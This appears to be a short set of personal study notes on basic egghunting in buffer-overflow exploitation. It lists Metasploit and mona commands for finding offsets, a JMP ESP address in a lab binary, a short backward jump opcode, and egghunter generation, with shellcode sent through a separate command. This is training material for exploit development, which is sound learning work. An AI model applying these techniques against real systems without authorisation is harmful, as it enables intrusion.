Skip to content

Basic Egghunting #

Source: CaptMeelo1

Commands learned #

  • Alternative to pattern create:
    • /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <number_of_buffer>
    • is
    • !mona pc <number_of_buffer>
  • Alternative to pattern offset
    • /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <number_of_buffer> -q <value_in_register>
    • is
    • !mona findmsp @ mona itself after sending the pattern
      • This can be used in conjunction with pattern_create + it tells you more details such as other registers and the size of the whole payload
  • !mona jmp -r esp -m 'essfunc.dll'
  • SHORT JUMP
    • \xEB<offset>
    • offset = i.e. 50 bytes back so '-50' convert to hex using the calculator site is 'FFFFFFFFFFFFFFCE' so it is \xCE therefore making the whole command \xEB\xCE,
    • This would technically only move you back 48 bytes since \xEB\xCE itself consumes 2 byes and will be counted in walking back
      • calculator site 2
  • !mona egg -t <keyword_you_would_like_to_use>
    • i.e. !mona egg -t Bellend
    • then send shellcode via other means like via other COMMAND (i.e. "STATS "+"BellendBellend"+shellcode)
    • make space for shellcode

Last update: January 22, 2021